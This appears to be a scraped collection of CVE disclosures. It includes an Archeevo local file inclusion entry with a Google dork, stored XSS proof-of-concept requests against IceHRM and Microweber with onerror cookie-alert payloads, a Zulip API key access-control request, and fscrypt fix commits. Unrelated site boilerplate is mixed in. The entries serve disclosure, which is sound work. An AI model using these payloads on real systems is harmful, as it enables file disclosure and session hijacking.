Archeevo below 5.0 is affected by local file inclusion through file=~/web.config to allow an attacker to retrieve local files.

    # Exploit Title: Archeevo 5.0 - Local File Inclusion
    # Google Dork: intitle:"archeevo"
    # Date: 01/15/2021
    # Exploit Author: Miguel Santareno
    # Vendor Homepage: https://www.keep.pt/
    # Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
    # Version: < 5.0
    # Tested on: windows
    
    # 1. Description
    
    Unauthenticated user can exploit LFI vulnerability in file parameter.
    
    
    # 2. Proof of Concept (PoC)
    
    Access a page that don’t exist like /test.aspx and then you will be redirected to
    https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
    
    After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
    /web.config file of the application.
    
    https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
    
    
    # 3. Research:
    https://miguelsantareno.github.io/MoD_1.pdf

CVE-2022-23377: Offensive Security’s Exploit Database Archive

An out-of-bounds read vulnerability exists in the GCode::extrude() functionality of Slic3r libslic3r 1.3.0 and Master Commit b1a5500. A specially crafted stl file could lead to information disclosure. An attacker can provide a malicious file to trigger this vulnerability.

HackMD

*   

*   

*   

*   *   Options
    *   Versions and GitHub Sync
    *   Transfer ownership
    *   Delete this note
    *   Template
    *   Insert from template
    *   Export
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Import
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Clipboard
    *   Download
    *   Markdown
    *   HTML
    *   Raw HTML
    *   ODF (Beta)
*   *   Sharing
    
    *   View mode
        
        *   Edit mode
        *   View mode
        *   Book mode
        *   Slide mode
        
    *   Note Permission
    *   Read
        
        *   Owners
        *   Signed-in users
        *   Everyone
        
    *   Write
        
        *   Owners
        *   Signed-in users
        *   Everyone
        
    *   More (Comment, Invitee)

CVE-2021-44962: Slic3r libslic3r STL File GCode::extrude() out-of-bounds read vulnerability

A stored cross-site scripting (XSS) vulnerability in Ice Hrm 30.0.0.OS allows attackers to steal cookies via a crafted payload inserted into the First Name field.

This vulnerability was reported to the maintainers on **Nov 23rd, 2021**, and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively.

An Authenticated user can set thier 'first name' to any unsanitized HTML or script.

IceHRM website fails to effectively filter html tags present in user input. This can cause malicious input sent by a logged in user to be stored on the database. This can lead to account takeover through cookie stealing of any other user who logs into the system, no other user interation is require.

    curl 'http://127.0.0.1/icehrm/app/service.php' \
      -H 'Connection: keep-alive' \
      -H 'Pragma: no-cache' \
      -H 'Cache-Control: no-cache' \
      -H 'sec-ch-ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"' \
      -H 'DNT: 1' \
      -H 'sec-ch-ua-mobile: ?0' \
      -H 'User-Agent: Mozilla/5.0' \
      -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
      -H 'Accept: application/json, text/javascript, */*; q=0.01' \
      -H 'X-Requested-With: XMLHttpRequest' \
      -H 'sec-ch-ua-platform: "Linux"' \
      -H 'Origin: http://127.0.0.1' \
      -H 'Sec-Fetch-Site: same-origin' \
      -H 'Sec-Fetch-Mode: cors' \
      -H 'Sec-Fetch-Dest: empty' \
      -H 'Referer: http://127.0.0.1/icehrm/app/?g=modules&&n=employees&m=modules_Personal_Information' \
      -H 'Accept-Language: en-US,en;q=0.9' \
      -H 'Cookie: PHPSESSID=p165r7jp664smtns7lh26tn6e8; tbl_session=lk93k2rif7jvprfqs05pqk41t65436nu' \
      -H 'sec-gpc: 1' \
      --data-raw 'id=2&first_name=hello%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&middle_name=&last_name=sd&nationality=2&birthday=2021-12-03&gender=Female&marital_status=Single&ssn_num=&nic_num=&other_id=&driving_license=&work_station_id=&address1=&address2=&city=&province=NULL&postal_code=&home_phone=&mobile_phone=&work_phone=&private_email=asd%40asd.com&a=add&t=Employee&content=HTML' \
      --compressed
    

#3. Login into the 'admin' account & Go to the following page where the name of the less privileged user gets displayed - 'System > Users' . You'll be able to see the alert box with session cookie of 'admin' user.

The extra added `content = HTML` request parameter causes the backend to ignore sanitization of user input.

A less privileged user can take over 'admin' account by stealing the session cookie.

CVE-2022-25015: Stored XSS vulnerability in dashboard of any logged-in user · Issue #285 · gamonoid/icehrm

The Yoast SEO WordPress plugin before 17.3 discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.

CVE-2021-25118: Changeset 2608691 – WordPress Plugin Repository

The Maps Plugin using Google Maps for WordPress plugin before 1.8.4 does not have CSRF checks in most of its AJAX actions, which could allow attackers to make logged in admins delete arbitrary posts and update the plugin's settings via a CSRF attack

CVE-2021-25081

The Maps Plugin using Google Maps for WordPress plugin before 1.8.1 does not have proper authorisation and CSRF in most of its AJAX actions, which could allow any authenticated users, such as subscriber to delete arbitrary posts and update the plugin's settings.

CVE-2021-25011

Improper Access Control in GitHub repository zulip/zulip prior to 4.10.

**Description**

According to the current design of the application, when the user wants to get value of api\_key, API /json/fetch\_api\_key will require password to authentication. However, the application exists another API routed at /json/users/me/api\_key/regenerate that allows regenerating api\_key value and doesn't requiring password authentication. Attacker who gets the user's valid session can call vulnerable API to extract the api\_key value without user's password.

**Proof of Concept****I'm using online service at https://testingnnnn.zulipchat.com.**

*   Step 1: Login as normal user, go to https://testingnnnn.zulipchat.com/#settings/account-and-privacy, click "Show/change your API key", application will ask for password to perform the action.
*   Step 2: In current session, call this request to regenerate and get value of api\_key

    POST /json/users/me/api_key/regenerate HTTP/2
    Host: testingnnnn.zulipchat.com
    Cookie: [YOUR_VALID_COOKIE]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Csrftoken: [VALID_CSRF_TOKEN]
    X-Requested-With: XMLHttpRequest
    Referer: https://testingnnnn.zulipchat.com/
    Connection: close
    
    
    

*   PoC:

Show api\_key: https://drive.google.com/file/d/1\_A7KQeoyByA3xYwIyJ1k9ZTywabwlEMM

Regenerate api\_key: https://drive.google.com/file/d/1Ob96FTju4irz2Hn2sXBXz\_JtMlEAmAp0

**Impact**

Bypass the protection mechanism in the design of the application. Attackers can get the api\_key value without knowing user's password.

CVE-2021-3967: Improper Access Control in zulip

Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.3.

**Description**

I found a Stored XSS vulnerability at admin page: https://demo.microweber.org/demo/admin/view:settings#option\_group=files

**Proof of Concept**

    Step 1: Go to Settings > Website settings > Files
    Step 2: Create new folder with folder name : <img scr=0 onerror=alert(1)>
    
    // Request
    ---------------------------------------
    POST /demo/api/create_media_dir HTTP/1.1
    Host: demo.microweber.org
    Cookie: back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Asettings%23option_group%3Dfiles; csrf-token-data=%7B%22value%22%3A%22CWFoo1r5aSs0Eh43ggbPh7ZrADzLJq9pqxcn2oVo%22%2C%22expiry%22%3A1645524272281%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=pnfZUavpfYyBW2Nem7BpY0Ove87uyklKnGMAZgpA; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CRrQ72IHSMWcZZ25VCSQGCbqyg25qhWmSDCJNwDVH4X3Z736hG3mxHR05oNrZ%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: https://demo.microweber.org
    Referer: https://demo.microweber.org/demo/admin/view:settings
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    path=&name=%3Cimg+src%3D0+onerror%3Dalert(1)%3E&new_folder=1
    ---------------------------------------
    
    Step3: After create folder successful, see alert popup
    
    PoC:
    Request: https://drive.google.com/file/d/1daorHwquywP3LPh6na5PIZzWb2lEL19W/view?usp=sharing
    Alert popup: https://drive.google.com/file/d/1iTtAwQNHrpfktGHHXDrJ_7XPYlBOAHxe/view?usp=sharing
    

**Impact**

This vulnerability is capable of stored XSS

CVE-2022-0763: Cross-site Scripting (XSS) - Stored in microweber

JetBrains IntelliJ IDEA 2021.3.1 Preview, IntelliJ IDEA 2021.3.1 RC, PyCharm Professional 2021.3.1 RC, GoLand 2021.3.1, PhpStorm 2021.3.1 Preview, PhpStorm 2021.3.1 RC, RubyMine 2021.3.1 Preview, RubyMine 2021.3.1 RC, CLion 2021.3.1, WebStorm 2021.3.1 Preview, and WebStorm 2021.3.1 RC (used as Remote Development backend IDEs) bind to the 0.0.0.0 IP address. The fixed versions are: IntelliJ IDEA 2021.3.1, PyCharm Professional 2021.3.1, GoLand 2021.3.2, PhpStorm 2021.3.1 (213.6461.83), RubyMine 2021.3.1, CLion 2021.3.2, and WebStorm 2021.3.1.

*   JavaScript
*   .NET
*   Java & JVM
*   C++
*   macOS & iOS
*   Python & Django
*   PHP
*   Ruby & Rails
*   Go
*   Kotlin
*   SQL
*   See all tools

**Trusted**

Many of the world's most dynamic companies and individuals find JetBrains tools make them more creative and effective.

12.8M

users trust our tools

Our tools are used all over the world in some of the best-known companies.

*   Google
*   NASA
*   Valve
*   Netflix
*   Ubisoft
*   Twitter

**Customer Stories**

See how the world's leading companies use JetBrains products

**OpenStack**

PyCharm has tons of advantages when compared to text editors in terms of supported functionality. With respect to Python development, PyCharm definitely stands out with features like remote debugging, code quality checks, and integrations with third-party software like Docker and Kubernetes.

Swapnil Kulkarni, Active Technology Contributor, OpenStack

Read case study

**Instil**

When the social distancing restrictions were introduced in March 2020, we needed a tool that would let us collaborate online with students as part of virtual deliveries, and Space was the obvious choice.

Garth Gilmour, Instil

Read case study

**VMware**

As our team carefully weighed the benefits and shortcomings of building our strategy upon each of the frameworks, Kotlin Multiplatform Mobile ultimately emerged as the framework of choice.

Kris Wong, Software Engineer/Architect, VMware

Read case study

More case studies

**Discover more**

CVE-2021-45977: JetBrains: Essential tools for software developers and teams

The bash_completion script for fscrypt allows injection of commands via crafted mountpoint paths, allowing privilege escalation under a specific set of circumstances. A local user who has control over mountpoint paths could potentially escalate their privileges if they create a malicious mountpoint path and if the system administrator happens to be using the fscrypt bash completion script to complete mountpoint paths.  We recommend upgrading to version 0.3.3 or above

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=88&v=4)

![josephlr](https://avatars.githubusercontent.com/u/5506060?s=60&v=4)

![dirkmueller](https://avatars.githubusercontent.com/u/1029152?s=60&v=4)

![mgerstner](https://avatars.githubusercontent.com/u/24227799?s=60&v=4)

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Following the example of /proc/self/mountinfo, replace the space,
newline, tab, and backslash characters with octal escape sequences so
that the output can be parsed unambiguously.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Mountpoint paths might be untrusted arbitrary strings; the fscrypt bash
completion script might need to complete to such strings.
Unfortunately, the design of bash completion places some major footguns
in the way of doing this correctly and securely:

   - "compgen -W" expands anything passed to it, so the argument to -W
     must be single-quoted to avoid an extra level of expansion.

   - The backslashes needed to escape meta-characters in the completed
     text aren't added automatically; they must be explicitly added.

Note that the completion script for 'umount' used to have these same
bugs (https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892179,
util-linux/util-linux#539).

Fix these bugs in roughly the same way that 'umount' fixed them.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Don't allow reading metadata files that are very large, as they can
crash the program due to the memory required.  Similarly, don't allow
reading metadata files that aren't regular files, such as FIFOs, or
symlinks (which could point to a device node like /dev/zero), as that
can hang the program.  Both issues were particularly problematic for
pam\_fscrypt, as they could prevent users from being able to log in.

Note: these checks are arguably unneeded if we strictly check the file
ownership too, which a later commit will do.  But there's no reason not
to do these basic checks too.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

If a login protector contains a UID that differs from the file owner
(and the file owner is not root), it might be a spoofed file that was
created maliciously, so make sure to consider such files to be invalid.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

To allow users to update fscrypt metadata they own in
single-user-writable metadata directories (introduced by the next
commit), fall back to non-atomic overwrites when atomic ones can't be
done due to not having write access to the directory.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

World-writable directories are not appropriate for some systems, so
offer a choice of single-user-writable and world-writable modes, with
single-user-writable being the default.  Add a new documentation section
to help users decide which one to use.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

The metadata validation checks introduced by the previous commits are
good, but to reduce the attack surface it would be much better to avoid
reading and parsing files owned by other users in the first place.

There are some possible use cases for users sharing fscrypt metadata
files, but I think that for the vast majority of users it is unneeded
and just opens up attack surface.  Thus, make fscrypt (and pam\_fscrypt)
not process policies or protectors owned by other users by default.
Specifically,

   \* If fscrypt or pam\_fscrypt is running as a non-root user, only
     policies and protectors owned by the user or by root can be used.

   \* If fscrypt is running as root, any policy or protector can be used.
     (This is to match user expectations -- starting a sudo session
     should gain rights, not remove rights.)

   \* If pam\_fscrypt is running as root, only policies and protectors
     owned by root can be used.  Note that this only applies when the
     root user themselves has an fscrypt login protector, which is rare.

Add an option 'allow\_cross\_user\_metadata' to /etc/fscrypt.conf which
allows restoring the old behavior for anyone who really needs it.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

A previous commit extended file ownership validation to policy and
protector files (by default -- there's an opt-out in /etc/fscrypt.conf).

However, that didn't apply to the parent directories:

	MOUNTPOINT
	MOUNTPOINT/.fscrypt
	MOUNTPOINT/.fscrypt/policies
	MOUNTPOINT/.fscrypt/protectors

The problem is that if the parent directories aren't trusted (owned by
another non-root user), then untrusted changes to their contents can be
made at any time, including the introduction of symlinks and so on.

While it's debatable how much of a problem this really is, given the
other validations that are done, it seems to be appropriate to validate
the parent directories too.

Therefore, this commit applies the same ownership validations to the
above four directories as are done on the metadata files themselves.

In addition, it is validated that none of these directories are symlinks
except for ".fscrypt" where this is explicitly supported.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Since commit 4c7c663 ("Set owner of login protectors to correct
user"), login protectors are made owned by the user when root creates
one on a user's behalf.  That's good, but the same isn't true of other
files that get created at the same time:

- The policy protecting the directory
- The protector link file, if the policy is on a different filesystem
- The recovery protector, if the policy is on a different filesystem
- The recovery instructions file

In preparation for setting all metadata files to mode 0600, start making
all these files owned by the user in this scenario as well.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Since fscrypt replaces metadata files rather than overwrites them (to
get atomicity), their owner will change to root if root makes a change.
That isn't too much of an issue when the files have mode 0644.  However,
it will become a much bigger issue when the files have mode 0600,
especially because existing files with mode 0644 would also get changed
to have mode 0600.

In preparation for this, start preserving the previous owner and mode of
policy and protector files when they are updated.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Currently, fscrypt policies and protectors are world readable, as they
are created with mode 0644.  While this can be nice for use cases where
users share these files, those use cases seem to be quite rare, and it's
not a great default security-wise since it exposes password hashes to
all users.  While fscrypt uses a very strong password hash algorithm, it
would still be best to follow the lead of /etc/shadow and keep this
information non-world-readable.

Therefore, start creating these files with mode 0600.

Of course, if users do actually want to share these files, they have the
option of simply chmod'ing them to a less restrictive mode.  An option
could also be added to make fscrypt use the old mode 0644; however, the
need for that is currently unclear.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

If the error is anything other than ErrNotSetup, it might be helpful to
know what is going on.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

pam\_fscrypt should never need to do anything for system users, so detect
them early so that we can avoid wasting any resources looking for their
login protector.

Tag

#google